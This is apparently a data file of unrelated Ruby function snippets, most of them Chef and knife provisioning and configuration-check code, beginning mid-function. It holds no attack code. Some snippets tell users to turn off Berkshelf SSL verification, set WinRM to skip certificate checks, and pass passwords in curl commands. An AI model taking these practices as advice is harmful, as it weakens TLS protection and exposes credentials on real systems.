and !win_check_for_pw.nil?\n output = ssh.exec!(win_check_for_pw)\n raise MU::Cloud::BootstrapTempFail, \"Got nil output from ssh session, waiting and retrying\" if output.nil?\n if !output.match(/True/)\n MU.log \"Setting Windows password for user #{@config['windows_admin_username']}\", details: ssh.exec!(win_set_pw)\n end\n end\n if windows?\n output = ssh.exec!(win_env_fix)\n output = ssh.exec!(win_installer_check)\n raise MU::Cloud::BootstrapTempFail, \"Got nil output from ssh session, waiting and retrying\" if output.nil?\n if output.match(/InProgress/)\n raise MU::Cloud::BootstrapTempFail, \"Windows Installer service is still doing something, need to wait\"\n end\n if set_hostname and !@hostname_set and @mu_windows_name\n output = ssh.exec!(win_check_for_hostname)\n raise MU::Cloud::BootstrapTempFail, \"Got nil output from ssh session, waiting and retrying\" if output.nil?\n if !output.match(/#{@mu_windows_name}/)\n MU.log \"Setting Windows hostname to #{@mu_windows_name}\", details: ssh.exec!(win_set_hostname)\n @hostname_set = true\n # Reboot from the API too, in case Windows is flailing\n if !@cloudobj.nil?\n @cloudobj.reboot\n else\n reboot\n end\n raise MU::Cloud::BootstrapTempFail, \"Set hostname in Windows, waiting for reboot\"\n end\n end\n else\n output = ssh.exec!(lnx_installer_check)\n if !output.nil? and !output.empty?\n raise MU::Cloud::BootstrapTempFail, \"Linux package manager is still doing something, need to wait (#{output})\"\n end\n if !@config['skipinitialupdates']\n output = ssh.exec!(lnx_updates_check)\n if !output.nil? and output.match(/userdata still running/)\n raise MU::Cloud::BootstrapTempFail, \"Waiting for initial userdata system updates to complete\"\n end\n end\n end\n rescue RuntimeError => e\n raise MU::Cloud::BootstrapTempFail, \"Got #{e.inspect} performing initial SSH connect tasks, will try again\"\n end\n\n end",
"def helpers; end",
"def helpers; end",
"def helpers; end",
"def run\n\n # Grab all the config params from command line, knife.rb etc\n self.config = Chef::Config.merge!(config)\n\n # Check if we have a knife.rb\n puts \"Check location of knife.rb\"\n checkfiles(:config_file,\"The config file (knife.rb) should be stored in a .chef folder here or higher (towards root)\")\n if config[:config_file].nil?\n exit 1\n else\n # We shouldn't reach this point but lets make sure we die if we somehow do.\n unless ::File.exists?(File.expand_path(config[:config_file]))\n exit 1\n end\n end\n \n puts \"Check chef basics\"\n checkparm(:chef_server_url,'chef_server_url should be set to point to your chef server (https://<server.name>/organizations/<orgname>)')\n checkfiles(:cookbook_path,\"cookbook_path should point to a valid directory\")\n\n puts \"Check author and copyright info\"\n checkparm(:cookbook_copyright,\"cookbook_copyright should be set to your company name\")\n checkparm(:cookbook_email,\"cookbook_email should be set to your eMail address\")\n\n\n puts \"Check keys exist\"\n checkfiles(:client_key,\"This file is used for authenticating to Chef server and is normally saved in .chef as client.pem\")\n checkfiles(:validation_key,\"This file is used for bootstraping new nodes and is stored in .chef as validator.pem\")\n checkparm(:validation_client_name,\"validation_client_name is normally set to <orgname>-validator\")\n\n puts \"Check proxy configuration\"\n checkparm(:http_proxy,\"http_proxy should be set to a valid proxy like http://myproxy.ge.com:3128\")\n checkparm(:https_proxy,\"https_proxy should be set to a valid proxy like http://myproxy.ge.com:3128\")\n checkparm(:bootstrap_proxy,\"bootstrap_proxy should be set to a valid proxy like http://myproxy.ge.com:3128\")\n checkparm(:no_proxy,\"no_proxy should be set to exclude certain domains like *.ge.com from being proxied. Dont add wildcard subnets like 3.*\")\n\n puts \"Check GIT/Gerrit\"\n checkparm(:reviewhost,\"reviewhost should be set to the FQDN of your Gerrit server (leave out the http:// and the port number)\")\n\n # Check if GIT has a default username configured\n result=`git config --get user.name`.chomp\n if result.length < 1\n puts ui.color(\" the git user.name is not set. Add it using:-\", :red)\n puts ui.color(\" git config --global user.name <username>\", :magenta)\n else\n puts ui.color(\" the git user.name is set to #{result}\", :green)\n end\n\n # Check if GIT has a default email address configured\n result=`git config --get user.email`.chomp\n if result.length < 1\n puts ui.color(\" the git user.email is not set. Add it using:-\", :red)\n puts ui.color(\" git config --global user.email <email address>\", :magenta)\n else\n puts ui.color(\" the git user.email is set to #{result}\", :green)\n end\n\n # Check if the git core.autocrlf is set correctly (different on Windows and OSX... 
TODO: Check on Linux)\n result=`git config --get core.autocrlf`.chomp\n case result\n when 'input'\n if (RUBY_PLATFORM =~ /.*darwin.*/) or (RUBY_PLATFORM =~ /.*linux.*/)\n puts ui.color(\" the git core.autocrlf is set to 'input' which is correct for OSX or Linux systems\", :green)\n end\n if (RUBY_PLATFORM =~ /.*mingw.*/) or (RUBY_PLATFORM =~ /.*cygwin.*/)\n puts ui.color(\" the git core.autocrlf is set to 'input' but Windows/Linux should use 'true' to prevent line ending problems\", :red)\n end\n\n when 'true'\n if (RUBY_PLATFORM =~ /.*mingw.*/) or (RUBY_PLATFORM =~ /.*cygwin.*/)\n puts ui.color(\" the git core.autocrlf is set to 'true' which is correct for Windows/Cygwin\", :green)\n end\n if (RUBY_PLATFORM =~ /.*darwin.*/) or (RUBY_PLATFORM =~ /.*linux.*/)\n puts ui.color(\" the git core.autocrlf is set to 'true' but OSX/Linux should use 'input' to prevent line ending problems\", :red)\n end\n\n else\n puts ui.color(\" the git core.autocrlf is set to '#{result}'\", :red)\n puts ui.color(\" the git core.autocrlf should be set to 'input' (on OSX or Linux) or 'true' (on Windows) to prevent line ending problems\", :magenta)\n end\n\n # Check if we have a git remote called Gerrit.\n result=`git config --get remote.gerrit.url`.chomp\n if result.length < 1\n puts ui.color(\" we don't seem to have a git remote called gerrit.\", :red)\n puts ui.color(\" If we are in a project folder, check you have a valid .gitreview file and try running:-\", :red)\n puts ui.color(\" git review -s\", :magenta)\n else\n puts ui.color(\" the git remote for gerrit is set to #{result}\", :green)\n end\n\n # Check we have the settings to install Vagrant box templates and create Vagrant boxes\n # TODO: Add a check to make sure the box is installed and the URL is valid\n puts \"Check Vagrant\"\n checkparm(:vagrant_box,\"vagrant_box should be set to the name of your vagrant box\")\n checkparm(:vagrant_box_url,\"vagrant_box_url should point to a downloadable vagrant box\")\n\n puts \"Check berkshelf\"\n # Do we actually have a berks config\n berksConfigFile=File.expand_path(File.join('~','.berkshelf','config.json'))\n checkfile('Berkshelf Config',berksConfigFile,\"You dont have a Berkshelf config. Try running 'berks config'\")\n\n if ::File.exists?(berksConfigFile)\n berksConfigRaw=File.read(berksConfigFile)\n berksConfig=JSON.parse(berksConfigRaw)\n\n # Make sure that SSL verify is off\n if berksConfig['ssl']['verify'].to_s == 'false'\n puts ui.color(\" SSL verify is turned off\", :green)\n else\n puts ui.color(\" SSL verify is 'true'... you should set it to 'false' to allow connecting to Chef server\", :red)\n end\n \n # Check berks is using correct Chef server URL\n if berksConfig['chef']['chef_server_url'].to_s == config[:chef_server_url]\n puts ui.color(\" Berkshelf chef_server_url is '#{berksConfig['chef']['chef_server_url']}'\", :green)\n else\n puts ui.color(\" Berkshelf chef_server_url does not match knife.rb. It's set to '#{berksConfig['chef']['chef_server_url']}'\", :red)\n end\n\n # Check berks is using correct validator.pem\n if berksConfig['chef']['validation_key_path'].to_s == File.expand_path(config[:validation_key])\n puts ui.color(\" Berkshelf validation_key_path is '#{berksConfig['chef']['validation_key_path']}'\", :green)\n else\n puts ui.color(\" Berkshelf validation_key_path does not match knife.rb. 
It's set to '#{berksConfig['chef']['validation_key_path']}'\", :red)\n end\n\n # Check berks is using correct client.pem\n if berksConfig['chef']['client_key'].to_s == File.expand_path(config[:client_key])\n puts ui.color(\" Berkshelf client_key is '#{berksConfig['chef']['client_key']}'\", :green)\n else\n puts ui.color(\" Berkshelf client_key does not match knife.rb. It's set to '#{berksConfig['chef']['client_key']}'\", :red)\n end\n\n puts \"Done !!!\"\n\n end\n\n end",
"def run_lamp_chef_checks\n # check that the standard unified app is responding on port 80\n run_unified_application_checks(@servers, 80)\n \n=begin \n # check that running the mysql backup script succeeds\n @servers.first.spot_check_command(\"/etc/cron.daily/mysql-dump-backup.sh\")\n \n # exercise operational RightScript(s)\n run_script(\"backup\", @servers.first)\n run_script(\"restart_apache\", @servers.first)\n \n # check that mysql tmpdir is custom setup on all servers\n query = \"show variables like 'tmpdir'\"\n query_command = \"echo -e \\\"#{query}\\\"| mysql\"\n @servers.each do |server|\n server.spot_check(query_command) { |result| raise \"Failure: tmpdir was unset#{result}\" unless result.include?(\"/mnt/mysqltmp\") }\n end\n \n # check that logrotate has mysqlslow in it\n @servers.each do |server|\n res = server.spot_check_command(\"logrotate --force -v /etc/logrotate.d/mysql-server\")\n raise \"LOGROTATE FAILURE, exited with non-zero status\" if res[:status] != 0\n raise \"DID NOT FIND mysqlslow.log in the log rotation!\" if res[:output] !~ /mysqlslow/\n end\n=end\n \n end",
"def bc_install_layout_1_chef(bc, path, barclamp)\n\n log_path = File.join '/var', 'log', 'barclamps'\n FileUtils.mkdir log_path unless File.directory? log_path\n log = File.join log_path, \"#{bc}.log\"\n system \"date >> #{log}\"\n puts \"Capturing chef install logs to #{log}\" if DEBUG\n chef = File.join path, 'chef'\n cookbooks = File.join chef, 'cookbooks'\n databags = File.join chef, 'data_bags'\n roles = File.join chef, 'roles'\n\n #upload the cookbooks\n if File.directory? cookbooks\n FileUtils.cd cookbooks\n knife_cookbook = \"knife cookbook upload -o . -a -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_cookbook + \" >> #{log} 2>&1\"\n puts \"\\t#{path} #{knife_cookbook} upload failed. Examine #{log} for more into\"\n exit 1\n end\n puts \"\\texecuted: #{path} #{knife_cookbook}\" if DEBUG \n else\n puts \"\\tNOTE: could not find cookbooks #{cookbooks}\" if DEBUG\n end\n \n #upload the databags\n if File.exists? databags\n Dir.entries(databags).each do |bag|\n next if bag == \".\" or bag == \"..\"\n bag_path = File.join databags, bag \n FileUtils.chmod 0755, bag_path\n chmod_dir 0644, bag_path\n FileUtils.cd bag_path\n knife_bag = \"knife data bag create #{bag} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_bag + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_bag} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"\\texecuted: #{path} #{knife_bag}\" if DEBUG\n\n json = Dir.entries(bag_path).find_all { |r| r.end_with?(\".json\") }\n json.each do |bag_file|\n knife_databag = \"knife data bag from file #{bag} #{bag_file} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_databag + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_databag} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"\\texecuted: #{path} #{knife_databag}\" if DEBUG\n end\n end\n else\n puts \"\\tNOTE: could not find databags #{databags}\" if DEBUG\n end\n\n #upload the roles\n if File.directory? roles\n FileUtils.cd roles\n Dir.entries(roles).find_all { |r| r.end_with?(\".rb\") }.each do |role|\n knife_role = \"knife role from file #{role} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_role + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_role} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"\\texecuted: #{path} #{knife_role}\" if DEBUG\n end\n else\n puts \"\\tNOTE: could not find roles #{roles}\" if DEBUG\n end\n\n puts \"Barclamp #{bc} (format v1) Chef Components Uploaded.\" \n\n end",
"def shellout_chef_client(run_list)\n sh(\"chef-client -z -o #{run_list} --force-formatter\")\nend",
"def chef_api_client\n @chef_api_client ||= begin\n require \"chef/api_client\"\n Chef::ApiClient\n end\n end",
"def bc_install_layout_1_chef(bc, path, barclamp, options={})\n options = {:debug => false}.merge! options\n debug = options[:debug] or ENV['DEBUG'] === \"true\"\n \n log_path = File.join '/var', 'log', 'barclamps'\n FileUtils.mkdir log_path unless File.directory? log_path\n log = File.join log_path, \"#{bc}.log\"\n system \"date >> #{log}\"\n puts \"DEBUG: Capturing chef install logs to #{log}\" if debug\n chef = File.join path, 'chef'\n cookbooks = File.join chef, 'cookbooks'\n databags = File.join chef, 'data_bags'\n roles = File.join chef, 'roles'\n \n #upload the cookbooks\n if File.directory? cookbooks\n FileUtils.cd cookbooks\n knife_cookbook = \"knife cookbook upload -o . -a -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_cookbook + \" >> #{log} 2>&1\"\n puts \"\\t#{path} #{knife_cookbook} upload failed. Examine #{log} for more into\"\n exit 1\n end\n puts \"DEBUG: \\texecuted: #{path} #{knife_cookbook}\" if debug \n else\n puts \"DEBUG: \\tNOTE: could not find cookbooks #{cookbooks}\" if debug\n end\n \n #upload the databags\n if File.exists? databags\n Dir.entries(databags).each do |bag|\n next if bag == \".\" or bag == \"..\"\n bag_path = File.join databags, bag \n FileUtils.chmod 0755, bag_path\n chmod_dir 0644, bag_path\n FileUtils.cd bag_path\n knife_bag = \"knife data bag create #{bag} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_bag + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_bag} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"\\texecuted: #{path} #{knife_bag}\" if debug\n \n json = Dir.entries(bag_path).find_all { |r| r.end_with?(\".json\") }\n json.each do |bag_file|\n knife_databag = \"knife data bag from file #{bag} #{bag_file} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_databag + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_databag} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"DEBUG: \\texecuted: #{path} #{knife_databag}\" if debug\n end\n end\n else\n puts \"DEBUG: \\tNOTE: could not find databags #{databags}\" if debug\n end\n \n #upload the roles\n if File.directory? roles\n FileUtils.cd roles\n Dir.entries(roles).find_all { |r| r.end_with?(\".rb\") }.each do |role|\n knife_role = \"knife role from file #{role} -V -k /etc/chef/webui.pem -u chef-webui\"\n unless system knife_role + \" >> #{log} 2>&1\"\n puts \"\\t#{knife_role} failed. Examine #{log} for more information.\"\n exit 1\n end\n puts \"DEBUG: \\texecuted: #{path} #{knife_role}\" if debug\n end\n else\n puts \"DEBUG: \\tNOTE: could not find roles #{roles}\" if debug\n end\n \n puts \"Barclamp #{bc} (format v1) Chef Components Uploaded.\" \n \nend",
"def bootstrap\n self.class.loadChefLib\n stashHostSSLCertSecret\n splunkVaultInit\n if !@config['cleaned_chef']\n begin\n leave_ours = @config['scrub_groomer'] ? false : true\n preClean(leave_ours)\n rescue RuntimeError => e\n MU.log e.inspect, MU::ERR\n sleep 10\n retry\n end\n @config['cleaned_chef'] = true\n end\n\n _nat_ssh_key, _nat_ssh_user, _nat_ssh_host, canonical_addr, ssh_user, ssh_key_name = @server.getSSHConfig\n\n MU.log \"Bootstrapping #{@server.mu_name} (#{canonical_addr}) with knife\"\n\n run_list = [\"recipe[mu-tools::newclient]\"]\n run_list << \"mu-tools::gcloud\" if @server.cloud == \"Google\" or @server.config['cloud'] == \"Google\"\n\n json_attribs = {}\n if !@config['application_attributes'].nil?\n json_attribs['application_attributes'] = @config['application_attributes']\n json_attribs['skipinitialupdates'] = @config['skipinitialupdates']\n end\n\n# XXX this seems to break Knife Bootstrap\n# vault_access = if !@config['vault_access'].nil?\n# @config['vault_access']\n# else\n# []\n# end\n\n @server.windows? ? max_retries = 25 : max_retries = 10\n @server.windows? ? timeout = 1800 : timeout = 300\n retries = 0\n begin\n load MU.myRoot+'/modules/mu/monkey_patches/chef_knife_ssh.rb'\n if !@server.windows?\n kb = ::Chef::Knife::Bootstrap.new([canonical_addr])\n kb.config[:use_sudo] = true\n kb.name_args = \"#{canonical_addr}\"\n kb.config[:distro] = 'chef-full'\n kb.config[:ssh_user] = ssh_user\n kb.config[:ssh_verify_host_key] = :accept_new\n kb.config[:forward_agent] = ssh_user\n kb.config[:identity_file] = \"#{Etc.getpwuid(Process.uid).dir}/.ssh/#{ssh_key_name}\"\n kb.config[:ssh_identity_file] = \"#{Etc.getpwuid(Process.uid).dir}/.ssh/#{ssh_key_name}\"\n else\n kb = ::Chef::Knife::BootstrapWindowsWinrm.new([@server.mu_name])\n kb.name_args = [@server.mu_name]\n kb.config[:manual] = true\n kb.config[:winrm_transport] = :ssl\n kb.config[:winrm_port] = 5986\n kb.config[:session_timeout] = timeout\n kb.config[:operation_timeout] = timeout\n# kb.config[:bootstrap_curl_options] = \"\"\n if retries % 2 == 0\n kb.config[:host] = canonical_addr\n kb.config[:winrm_authentication_protocol] = :basic\n kb.config[:winrm_user] = @server.config['windows_admin_username']\n kb.config[:winrm_password] = @server.getWindowsAdminPassword\n else\n kb.config[:host] = @server.mu_name\n kb.config[:winrm_authentication_protocol] = :cert\n kb.config[:winrm_client_cert] = \"#{MU.mySSLDir}/#{@server.mu_name}-winrm.crt\"\n kb.config[:winrm_client_key] = \"#{MU.mySSLDir}/#{@server.mu_name}-winrm.key\"\n end\n# kb.config[:ca_trust_file] = \"#{MU.mySSLDir}/Mu_CA.pem\"\n # XXX ca_trust_file doesn't work for some reason, so we have to set the below for now\n kb.config[:winrm_ssl_verify_mode] = :verify_none\n kb.config[:msi_url] = \"https://www.chef.io/chef/download?p=windows&pv=2012&m=x86_64&v=#{MU.chefVersion}\"\n end\n\n # XXX this seems to break Knife Bootstrap\n # if vault_access.size > 0\n # v = {}\n # vault_access.each { |vault|\n # v[vault['vault']] = [] if v[vault['vault']].nil?\n # v[vault['vault']] << vault['item']\n # }\n # kb.config[:bootstrap_vault_json] = JSON.generate(v)\n # end\n\n kb.config[:json_attribs] = JSON.generate(json_attribs) if json_attribs.size > 1\n kb.config[:run_list] = run_list\n kb.config[:chef_node_name] = @server.mu_name\n kb.config[:bootstrap_product] = \"chef\"\n kb.config[:bootstrap_version] = MU.chefVersion\n kb.config[:channel] = \"stable\"\n # XXX key off of MU verbosity level\n kb.config[:log_level] = :debug\n # kb.config[:ssh_gateway] = 
\"#{nat_ssh_user}@#{nat_ssh_host}\" if !nat_ssh_host.nil? # Breaking bootsrap\n\n MU.log \"Knife Bootstrap settings for #{@server.mu_name} (#{canonical_addr}), timeout set to #{timeout.to_s}\", MU::NOTICE, details: kb.config\n if @server.windows? and @server.windowsRebootPending?\n raise MU::Cloud::BootstrapTempFail, \"#{@server.mu_name} has a pending reboot\"\n end\n Timeout::timeout(timeout) {\n MU::Cloud.handleNetSSHExceptions\n kb.run\n }\n # throws Net::HTTPServerException if we haven't really bootstrapped\n ::Chef::Node.load(@server.mu_name)\n rescue SystemExit, Timeout::Error, MU::Cloud::BootstrapTempFail, Net::HTTPServerException, HTTPClient::ConnectTimeoutError, WinRM::WinRMError, Net::SSH::AuthenticationFailed, Net::SSH::Disconnect, Net::SSH::ConnectionTimeout, Net::SSH::Proxy::ConnectError, Net::SSH::Exception, Errno::ECONNRESET, Errno::EHOSTUNREACH, Errno::ECONNREFUSED, Errno::EPIPE, SocketError, IOError => e\n if retries < max_retries\n retries += 1\n # Bad Chef installs are possible culprits of bootstrap failures, so\n # try scrubbing them when that happens.\n # On Windows, even a fresh install comes up screwy disturbingly\n # often, so we let it start over from scratch if needed. Except for\n # the first attempt, which usually fails due to WinRM funk.\n if !e.is_a?(MU::Cloud::BootstrapTempFail) and\n !(e.is_a?(WinRM::WinRMError) and @config['forced_preclean']) and\n !@config['forced_preclean']\n begin\n preClean(false) # it's ok for this to fail\n rescue StandardError => e\n end\n MU::Groomer::Chef.purge(@server.mu_name, nodeonly: true)\n @config['forced_preclean'] = true\n @server.reboot if @server.windows? # *sigh*\n end\n MU.log \"#{@server.mu_name}: Knife Bootstrap failed #{e.inspect}, retrying in #{(10*retries).to_s}s (#{retries} of #{max_retries})\", MU::WARN, details: e.backtrace\n sleep 10*retries\n retry\n else\n raise MuError, \"#{@server.mu_name}: Knife Bootstrap failed too many times with #{e.inspect}\"\n end\n rescue StandardError => e\nMU.log e.inspect, MU::ERR, details: e.backtrace\nsleep 10*retries\nretry\n end\n\n\n # Now that we're done, remove one-shot bootstrap recipes from the\n # node's final run list\n [\"mu-tools::newclient\"].each { |recipe|\n begin\n ::Chef::Knife.run(['node', 'run_list', 'remove', @server.mu_name, \"recipe[#{recipe}]\"], {})\n rescue SystemExit => e\n MU.log \"#{@server.mu_name}: Run list removal of recipe[#{recipe}] failed with #{e.inspect}\", MU::WARN\n end\n }\n knifeAddToRunList(\"role[mu-node]\")\n knifeAddToRunList(\"recipe[mu-tools::selinux]\")\n\n grantSecretAccess(@server.mu_name, \"windows_credentials\") if @server.windows?\n grantSecretAccess(@server.mu_name, \"ssl_cert\")\n\n saveChefMetadata\n knifeAddToRunList(\"recipe[mu-tools::updates]\") if !@config['skipinitialupdates']\n # Making sure all Windows nodes get the mu-tools::windows-client recipe\n if @server.windows?\n knifeAddToRunList(\"recipe[mu-tools::windows-client]\")\n run(purpose: \"Base Windows configuration\", update_runlist: false, max_retries: 20)\n elsif !@config['skipinitialupdates']\n run(purpose: \"Base configuration\", update_runlist: false, max_retries: 20)\n end\n ::Chef::Knife.run(['node', 'run_list', 'remove', @server.mu_name, \"recipe[mu-tools::updates]\"], {}) if !@config['skipinitialupdates']\n ::Chef::Knife.run(['node', 'run_list', 'remove', @server.mu_name, \"recipe[mu-tools::selinux]\"], {})\n\n # This will deal with Active Directory integration.\n if !@config['active_directory'].nil?\n if @config['active_directory']['domain_operation'] == 
\"join\"\n knifeAddToRunList(\"recipe[mu-activedirectory::domain-node]\")\n run(purpose: \"Join Active Directory\", update_runlist: false, max_retries: max_retries)\n elsif @config['active_directory']['domain_operation'] == \"create\"\n knifeAddToRunList(\"recipe[mu-activedirectory::domain]\")\n run(purpose: \"Create Active Directory Domain\", update_runlist: false, max_retries: 15)\n elsif @config['active_directory']['domain_operation'] == \"add_controller\"\n knifeAddToRunList(\"recipe[mu-activedirectory::domain-controller]\")\n run(purpose: \"Add Domain Controller to Active Directory\", update_runlist: false, max_retries: 15)\n end\n end\n\n if !@config['run_list'].nil?\n knifeAddToRunList(multiple: @config['run_list'])\n end\n\n saveDeployData\n end",
"def provision_chef_common(chef, key, chef_config, vm_config)\n # set_instance_variable(chef_config, chef, 'environment', '_default' )\n # set_instance_variable(chef_config, chef, 'version', '12.19.36' )\n properties = [\n 'attempts',\n 'enable_reporting',\n 'encrypted_data_bag_secret_key_path',\n 'environment',\n 'run_list',\n 'verbose_logging',\n 'version'\n ]\n properties.each do | property_name |\n set_instance_variable(chef_config, chef, property_name )\n end\nend",
"def define_helpers; end",
"def initialize chef_recipe\n super(chef_recipe.cookbook_name, chef_recipe.recipe_name, chef_recipe.run_context)\n\n # TODO: Support other distributions besides 'linux'\n node.default[\"serf\"][\"binary_url\"] = File.join node[\"serf\"][\"base_binary_url\"], \"#{node[\"serf\"][\"version\"]}\", \"serf_#{node[\"serf\"][\"version\"]}_linux_#{node[\"serf\"][\"arch\"]}.zip\"\n\n current_version = get_serf_installed_version\n if current_version\n Chef::Log.info \"Current Serf Version : [#{current_version}]\"\n end\n end",
"def helpers\n Blush.helpers\n end",
"def cookbook_runlist\n verify_cookbook_creation\n\n Souschef::Print.header 'Berkshelf configuration'\n Souschef::Berkshelf.new(@opts).berks_create\n Souschef::Print.header 'Configure gemfile'\n Souschef::Gemfile.new(@opts).write\n Souschef::Print.header 'Create essential template files'\n Souschef::Template.run(@opts)\n # Mock Scaffold to generate default recipe and tests\n\n Souschef::Print.header 'Create default recipe and tests'\n Souschef::Scaffold.new(path: @opts[:path],\n recipe: 'default',\n profile: @opts[:profile],\n force: true,\n verbose: @opts[:verbose]).start\n\n Souschef::Print.header 'Testkitchen configuration'\n Souschef::Testkitchen.new(@opts).setup\n\n Souschef::Print.header \"Don't forget to run bundle install!\"\n end",
"def load_cloudflare_cookbook_gems\n return if defined? @@cloudflare_cookbook_gems_loaded\n chef_gem 'cloudflare' do\n action :install\n version '2.0.1'\n end\n require 'resolv'\n require 'cloudflare'\n @@cloudflare_cookbook_gems_loaded = true\nend",
"def chef_client_command\n \"chef-client\"\n end",
"def mounted_helpers; end",
"def generate_chef_config()\n Kitchenplan::Log.info 'Generating the Chef configs'\n #$: << File.join((File.expand_path(\"../\", Pathname.new(__FILE__).realpath)), \"/lib\")\n File.open(\"kitchenplan-attributes.json\", 'w') do |out|\n\tout.write(::JSON.pretty_generate(self.config['attributes']))\n end\n File.open(\"solo.rb\", 'w') do |out|\n\tout.write(\"cookbook_path [ \\\"#{Dir.pwd}/cookbooks\\\" ]\")\n end\n end",
"def chef_credentials\n creds = Hash.new\n File.open(ENV['HOME'] + '/.chef/knife.rb').each do |line|\n creds['c_uri'] = line.scan(/'([^']*)'/).join(' ') if line.match('chef_server_url')\n creds['c_key'] = line.scan(/'([^']*)'/).join(' ') if line.match('client_key')\n creds['c_node'] = line.scan(/'([^']*)'/).join(' ') if line.match('node_name')\n end\n return creds\nrescue => e\n puts '(chef=>tenant_prov): Unable to access Chef credentials. Check the knife.rb file for the user environment.'\n puts \"(chef=>tenant_prov): Error: #{e}\"\n exit\nend",
"def set_vars\n #Set up vars with AEM package manager urls, etc.\n vars = {}\n vars[:recursive] = new_resource.recursive ? '\\\\&recursive=true' : \"\"\n vars[:file_name] = \"#{new_resource.name}-#{new_resource.version}\" +\n \"#{new_resource.file_extension}\"\n vars[:download_url] = new_resource.package_url\n vars[:file_path] = \"#{Chef::Config[:file_cache_path]}/#{vars[:file_name]}\"\n vars[:user] = new_resource.user\n vars[:password] = new_resource.password\n vars[:port] = new_resource.port\n vars[:group_id] = new_resource.group_id\n vars[:upload_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -F\" +\n \" package=@#{vars[:file_path]} http://localhost:\" +\n \"#{vars[:port]}/crx/packmgr/service/.json?cmd=upload\"\n vars[:delete_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=delete\"\n vars[:install_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=install#{vars[:recursive]}\"\n vars[:activate_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=replicate\"\n vars[:uninstall_cmd] = \"curl -s -S -u #{vars[:user]}:#{vars[:password]} -X\" +\n \" POST http://localhost:#{vars[:port]}/crx/packmgr/\" +\n \"service/.json/etc/packages/#{vars[:group_id]}/\" +\n \"#{vars[:file_name]}?cmd=uninstall\"\n\n vars\nend",
"def configure_chef\n # setup logger for mixlib-shellout gem to consume instead of the chef\n # v0.10.10 behavior of not logging ShellOut calls by default. also setup\n # command failure exception and callback for legacy reasons.\n ::Mixlib::ShellOut.default_logger = ::Chef::Log\n ::Mixlib::ShellOut.command_failure_callback = lambda do |params|\n failure_reason = ::RightScale::SubprocessFormatting.reason(params[:status])\n expected_error_codes = Array(params[:args][:returns]).join(' or ')\n ::RightScale::Exceptions::Exec.new(\"\\\"#{params[:args][:command]}\\\" #{failure_reason}, expected #{expected_error_codes}.\",\n params[:args][:cwd])\n end\n\n # Chef run mode is always solo for cook\n Chef::Config[:solo] = true\n\n # determine default cookbooks path. If debugging cookbooks, place the debug pat(s) first, otherwise\n # clear out the list as it will be filled out with cookbooks needed for this converge as they are downloaded.\n if CookState.use_cookbooks_path?\n Chef::Config[:cookbook_path] = [CookState.cookbooks_path].flatten\n @audit.append_info(\"Using development cookbooks repositories path:\\n\\t- #{Chef::Config[:cookbook_path].join(\"\\n\\t- \")}\")\n else\n # reset the cookbook path. Will be filled out with cookbooks needed for this execution\n Chef::Config[:cookbook_path] = []\n end\n # add the rightscript cookbook if there are rightscripts in this converge\n Chef::Config[:cookbook_path] << @right_scripts_cookbook.repo_dir unless @right_scripts_cookbook.empty?\n\n # must set file cache path and ensure it exists otherwise evented run_command will fail\n file_cache_path = File.join(AgentConfig.cache_dir, 'chef')\n Chef::Config[:file_cache_path] = file_cache_path\n FileUtils.mkdir_p(Chef::Config[:file_cache_path])\n\n Chef::Config[:cache_options][:path] = File.join(file_cache_path, 'checksums')\n FileUtils.mkdir_p(Chef::Config[:cache_options][:path])\n\n # Where backups of chef-managed files should go. Set to nil to backup to the same directory the file being backed up is in.\n Chef::Config[:file_backup_path] = nil\n\n # Chef 11+ defaults client_fork to true which cause Chef::Client to fork\n # This create problems with right_popen - right_popen expects to be used inside running EM reactor\n # EM seems not to play well with forking\n Chef::Config[:client_fork] = false\n\n # Chef 11+ allow concurrent execution of the recipes in different theads,\n # by setting different lockfile per thread.\n Chef::Config[:lockfile] = File.join(Chef::Config[:file_cache_path], \"chef-client-#{@thread_name}-running.pid\")\n\n true\n end",
"def gemspec_helper; end",
"def gemspec_helper; end",
"def gemspec_helper; end",
"def gemspec_helper; end",
"def gemspec_helper; end",
"def gemspec_helper; end",
